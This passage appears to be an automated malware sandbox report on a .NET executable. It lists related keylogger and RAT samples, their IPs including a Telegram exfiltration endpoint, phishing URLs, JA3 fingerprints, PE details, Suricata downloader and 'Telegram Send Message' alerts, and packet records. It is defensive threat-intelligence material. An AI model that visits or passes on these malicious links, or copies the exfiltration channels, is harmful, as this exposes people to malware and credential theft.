                                                                                                                                                              FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 158.101.44.242

                                                                                                                                                              ASNs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              TELEGRAMRUHVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              http://t.me/hhackplusGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.99
                                                                                                                                                              CLOUDFLARENETUSHVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 188.114.96.3
                                                                                                                                                              https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.18.95.41
                                                                                                                                                              https://u18282959.ct.sendgrid.net/ls/click?upn=u001.rEMfFlpAoJgeimh0eSdetqZJOaDEFgZEM86yJv-2FFqn4BDVcYSBJ7qe3MiIpMf7EHr39f_olH575WPuDKQ6-2BlwfkTb3bEPQyZlspfhjzLUkESeUKdz-2BSLVmhS-2BiNhtE4sjBDlEtszfbsE5c6igxavK3muY3tYeP6QkmX-2BJi-2BaLU6j8Wsp6hQUS9QOYhOuxeiGpmu9xPXTXniG-2FhK47xPzbY2a7dAVr4WH1EaPd9qfgngR-2BS0-2BE0l9vGYKsxljCm-2F3LXvjLQIge-2FSmK3YEyKDG8HCxUjDZIuKEbjKZRrfVUUqiw37aYZrphVQ5WvB0QOlR-2Be2shKtaVihd3RfTtBEd0NyHk9A-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.18.86.42
                                                                                                                                                              XL-1-6-25-(EXCEL LATEST 2025).htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 104.17.25.14
                                                                                                                                                              oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 188.114.96.3
                                                                                                                                                              http://vwi46h7.terraclicks.click/rd/4fRUWo26099tRCA461sdwbdplppv232VXGPAFVAHBPJXIV321477KIEL571756p9Get hashmaliciousPhisherBrowse
                                                                                                                                                              • 188.114.96.3
                                                                                                                                                              http://wfs.SATSGroup.co/login.php?id=bmZlcmRpbmFuZG9Ad2ZzLmFlcm8=Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.17.25.14
                                                                                                                                                              https://url.uk.m.mimecastprotect.com/s/jiGQCnr5DH7GvmPu9fVSJcV9l?domain=wfs.satsgroup.coGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.17.25.14
                                                                                                                                                              VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 188.114.96.3
                                                                                                                                                              UTMEMUSHVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              miori.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 132.224.247.83
                                                                                                                                                              ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adHVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 188.114.97.3
                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eHVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              z.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              h.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              web55.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              atomxml.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              QUOTATION - RFQ2496_PO 08775622879.pdf(87kb).com.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              174.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              • 149.154.167.220

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pbCN4g6sN5.exe.log

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\Desktop\pbCN4g6sN5.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1216
                                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
                                                                                                                                                              MD5:7B709BC412BEC5C3CFD861C041DAD408
                                                                                                                                                              SHA1:532EA6BB3018AE3B51E7A5788F614A6C49252BCF
                                                                                                                                                              SHA-256:733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
                                                                                                                                                              SHA-512:B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
                                                                                                                                                              Malicious:true
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Entropy (8bit):6.997924935682203
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                              File name:pbCN4g6sN5.exe
                                                                                                                                                              File size:816'128 bytes
                                                                                                                                                              MD5:7d88e5bad194e89ada135543169da996
                                                                                                                                                              SHA1:929a742475ae4b93a5e164b1d565d7d7f78f6b62
                                                                                                                                                              SHA256:0d6d13b615ce21e4a4ff75ec6ad0047a5664aafc05745188afc2e4497c2bed9f
                                                                                                                                                              SHA512:8906f861bc6049f059757a24d326b21ea626d4b890791c1e10f101a8f387ae24febcc5501440ea45d07675c775286664dcd75d4f61a2929939cc87169ae0aede
                                                                                                                                                              SSDEEP:12288:zibdSKErr8jptCVn7B/7jJIk9dB6g5MCao3AiqLwgDn7PK:VqpgVt/7mk9dBKo3A9LD7PK
                                                                                                                                                              TLSH:3005E0007385ED7AF8B804368774C7F751ACEE0294AB169F496E3A47BC7C22639F2495
                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g.t9.................4...>......^R... ...`....@.. ....................................`................................

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:74f0d4d4d4d4d4cc

                                                                                                                                                              Static PE Info

                                                                                                                                                              General

                                                                                                                                                              Entrypoint:0x4b525e
                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                              Digitally signed:false
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                              Time Stamp:0x3974DE67 [Tue Jul 18 22:47:03 2000 UTC]
                                                                                                                                                              TLS Callbacks:
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:4
                                                                                                                                                              OS Version Minor:0
                                                                                                                                                              File Version Major:4
                                                                                                                                                              File Version Minor:0
                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                              Entrypoint Preview

                                                                                                                                                              Instruction
                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al

                                                                                                                                                              Data Directories

                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb52100x4b.text
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x13ac8.rsrc
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                              Sections

                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                              .text0x20000xb32640xb3400ca24903e1a54d4620213a802a8cb08ddFalse0.6400488689853556data7.045918402735076IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                              .rsrc0xb60000x13ac80x13c003b35da8abd436ffa84ad1a516fa28b1bFalse0.42601611946202533data6.0105573277605675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                              .reloc0xca0000xc0x2004c89f604887db2a126260a77844927b7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                              Resources

                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                              RT_ICON0xb66580x42b0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9922680412371134
                                                                                                                                                              RT_ICON0xba9080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.4594882729211087
                                                                                                                                                              RT_ICON0xbb7b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.48826714801444043
                                                                                                                                                              RT_ICON0xbc0580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.478110599078341
                                                                                                                                                              RT_ICON0xbc7200x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.37210982658959535
                                                                                                                                                              RT_ICON0xbcc880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.24201244813278008
                                                                                                                                                              RT_ICON0xbf2300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.2924484052532833
                                                                                                                                                              RT_ICON0xc02d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.3942622950819672
                                                                                                                                                              RT_ICON0xc0c600x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.49379432624113473
                                                                                                                                                              RT_ICON0xc10c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.33198924731182794
                                                                                                                                                              RT_ICON0xc13b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.41216216216216217
                                                                                                                                                              RT_ICON0xc14d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.42905405405405406
                                                                                                                                                              RT_ICON0xc16000x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.2661290322580645
                                                                                                                                                              RT_ICON0xc18e80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.18010752688172044
                                                                                                                                                              RT_ICON0xc1bd00x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.35135135135135137
                                                                                                                                                              RT_ICON0xc1cf80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.06092057761732852
                                                                                                                                                              RT_ICON0xc25a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.07658959537572255
                                                                                                                                                              RT_ICON0xc2b080xca8Device independent bitmap graphic, 32 x 64 x 24, image size 30720.042901234567901236
                                                                                                                                                              RT_ICON0xc37b00x368Device independent bitmap graphic, 16 x 32 x 24, image size 7680.10550458715596331
                                                                                                                                                              RT_ICON0xc3b180x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6400709219858156
                                                                                                                                                              RT_ICON0xc3f800x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.5
                                                                                                                                                              RT_ICON0xc40a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.19060283687943264
                                                                                                                                                              RT_ICON0xc45100x1128Device independent bitmap graphic, 32 x 64 x 32, image size 43520.11429872495446267
                                                                                                                                                              RT_ICON0xc56380x2668Device independent bitmap graphic, 48 x 96 x 32, image size 97920.07211147274206672
                                                                                                                                                              RT_ICON0xc7ca00x1952PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.7099660598580685
                                                                                                                                                              RT_GROUP_ICON0xc95f40x3edata0.8709677419354839
                                                                                                                                                              RT_GROUP_ICON0xc96340x84data0.6893939393939394
                                                                                                                                                              RT_GROUP_ICON0xc96b80x22data1.0588235294117647
                                                                                                                                                              RT_GROUP_ICON0xc96dc0x22data1.0588235294117647
                                                                                                                                                              RT_GROUP_ICON0xc97000x5adata0.7666666666666667
                                                                                                                                                              RT_GROUP_ICON0xc975c0x22data1.1176470588235294
                                                                                                                                                              RT_VERSION0xc97800x348dataEnglishUnited States0.4154761904761905

                                                                                                                                                              Imports

                                                                                                                                                              DLLImport
                                                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                                                              Possible Origin

                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                              EnglishUnited States

                                                                                                                                                              Network Behavior

                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                              2025-01-08T16:33:08.959347+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449821132.226.8.16980TCP
                                                                                                                                                              2025-01-08T16:33:10.111995+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449821132.226.8.16980TCP
                                                                                                                                                              2025-01-08T16:33:10.683264+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449836188.114.97.3443TCP
                                                                                                                                                              2025-01-08T16:33:11.537491+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449841132.226.8.16980TCP
                                                                                                                                                              2025-01-08T16:33:15.157202+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449869188.114.97.3443TCP
                                                                                                                                                              2025-01-08T16:33:18.079410+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449892188.114.97.3443TCP
                                                                                                                                                              2025-01-08T16:33:21.949552+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449920149.154.167.220443TCP

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 8, 2025 16:33:07.821955919 CET4982180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:07.826802015 CET8049821132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:07.826909065 CET4982180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:07.827218056 CET4982180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:07.831980944 CET8049821132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:08.627363920 CET8049821132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:08.630911112 CET4982180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:08.635660887 CET8049821132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:08.905949116 CET8049821132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:08.952450991 CET49827443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:08.952493906 CET44349827188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:08.952575922 CET49827443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:08.959347010 CET4982180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:08.960103989 CET49827443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:08.960123062 CET44349827188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:09.571170092 CET44349827188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:09.571250916 CET49827443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:09.575360060 CET49827443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:09.575380087 CET44349827188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:09.575673103 CET44349827188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:09.615621090 CET49827443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:09.628108978 CET49827443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:09.675323009 CET44349827188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:09.780637026 CET44349827188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:09.780689955 CET44349827188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:09.780874968 CET49827443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:09.787493944 CET49827443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:09.791059971 CET4982180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:09.795845032 CET8049821132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.063947916 CET8049821132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.066129923 CET49836443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:10.066153049 CET44349836188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.066231966 CET49836443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:10.066503048 CET49836443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:10.066517115 CET44349836188.114.97.3192.168.2.4
